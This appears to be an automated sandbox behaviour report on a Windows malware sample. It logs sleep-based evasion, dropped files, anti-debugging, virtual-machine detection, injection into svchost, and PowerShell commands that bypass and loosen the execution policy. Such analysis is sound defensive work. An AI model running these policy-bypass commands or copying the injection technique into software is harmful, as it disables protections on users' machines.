                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeWindow / User API: threadDelayed 5686Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8262Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1199Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3916Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 477Jump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeDropped PE file which has not been started: C:\Users\Public\Bilite\360inst_install.exeJump to dropped file
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\backup.dllJump to dropped file
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 7684Thread sleep time: -73000s >= -30000sJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 7680Thread sleep time: -63000s >= -30000sJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 5888Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 7580Thread sleep count: 247 > 30Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 4944Thread sleep count: 5686 > 30Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 4944Thread sleep time: -56860s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 864Thread sleep count: 254 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5232Thread sleep count: 8262 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5064Thread sleep count: 1199 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5776Thread sleep count: 3916 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7476Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4476Thread sleep count: 477 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 4284Thread sleep count: 269 > 30
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 1244Thread sleep count: 264 > 30
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 5828Thread sleep count: 121 > 30
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeLast function: Thread delayed
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeThread sleep count: Count: 5686 delay: -10Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeCode function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040301A
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeCode function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402B79
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C39F888 FindFirstFileExW,RevokeDragDrop,FindNextFileW,FindClose,FindClose,3_2_6C39F888
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C39F7D7 FindFirstFileExW,3_2_6C39F7D7
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034E80F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,3_2_034E80F0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034E7410 GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,3_2_034E7410
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeThread delayed: delay time: 73000Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: 360inst_install.exe.0.drBinary or memory string: vVIRTUAL SCSIVIRTUAL HDVIRTUAL DISKISCSIRED HAT VIRTIORAMDISKRAM-DISKRAM DISKRAID ARRAYRAID10RAID5RAID1XENSRC XEN VMWAREVBOX HARDDISKQEMU HARDDISKPROMISE 1+0MSFT VIRTUALMICROSOFTMARVELL RAIDLSILOGICLSI MR92LSI MEGALENOVO_RAIDINTEL RAIDIBM SERVERAIDDELL PERCAMD-RAID ARRAYADAPTECRAID0SOFTWARE\360Safe\softmgr\dioraidRAIDIM2S313BR240G BR128G BR120G BR60G 256GB 256GB 256G 256G 240GB 128GB 128GB 128G 128G 120GB 120G
                      Source: powershell.exe, 00000012.00000002.2632273712.0000000004EA5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000012.00000002.2632273712.0000000004EA5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000012.00000002.2632273712.0000000004EA5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: Update.exe, 00000003.00000003.2921395641.0000000000596000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3563071953.0000000000596000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeAPI call chain: ExitProcess graph end nodegraph_3-70401
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_000215D0 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_000215D0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034F054D VirtualProtect ?,-00000001,00000104,?3_2_034F054D
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeCode function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,0_2_00406D5D
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00910AE4 mov eax, dword ptr fs:[00000030h]3_2_00910AE4
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_030400CD mov eax, dword ptr fs:[00000030h]3_2_030400CD
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034E6790 wsprintfW,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree,3_2_034E6790
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00021A8F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00021A8F
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_000215D0 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_000215D0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00021764 SetUnhandledExceptionFilter,3_2_00021764
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034EDF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,3_2_034EDF10
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034EF00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_034EF00A
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034F1F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_034F1F67
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C38C85A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C38C85A
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C393AAF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C393AAF
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C38C4ED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C38C4ED
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_10006815 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_10006815
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_10008587 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_10008587
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_009167EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_009167EC

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Bypasses PowerShell execution policy
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Contains functionality to inject code into remote processes
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034E77E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,3_2_034E77E0
                      Contains functionality to inject threads in other processes
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034E77E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,3_2_034E77E0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe3_2_034E77E0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe3_2_034E77E0
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bilite\Axialis\Update.exe C:\Users\Public\Bilite\Axialis\Update.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
                      Source: Update.exe, 00000003.00000002.3564873344.0000000004691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inProgram Manager
                      Source: Update.exe, 00000003.00000003.3251872110.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000003.3080679847.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000003.2762477025.000000000466D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 minProgram Manager0
                      Source: Update.exe, 00000003.00000003.2921881516.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000003.2921820628.0000000004691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 minProgram ManagerO
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeCode function: 0_2_0040D72E cpuid 0_2_0040D72E
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_00401F9D
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,3_2_034E5430
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: EnumSystemLocalesW,3_2_6C39CEBE
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetLocaleInfoW,3_2_6C3A682C
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_6C3A68D3
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetLocaleInfoW,3_2_6C3A69D9
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetLocaleInfoW,3_2_6C39C9C3
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_6C3A645A
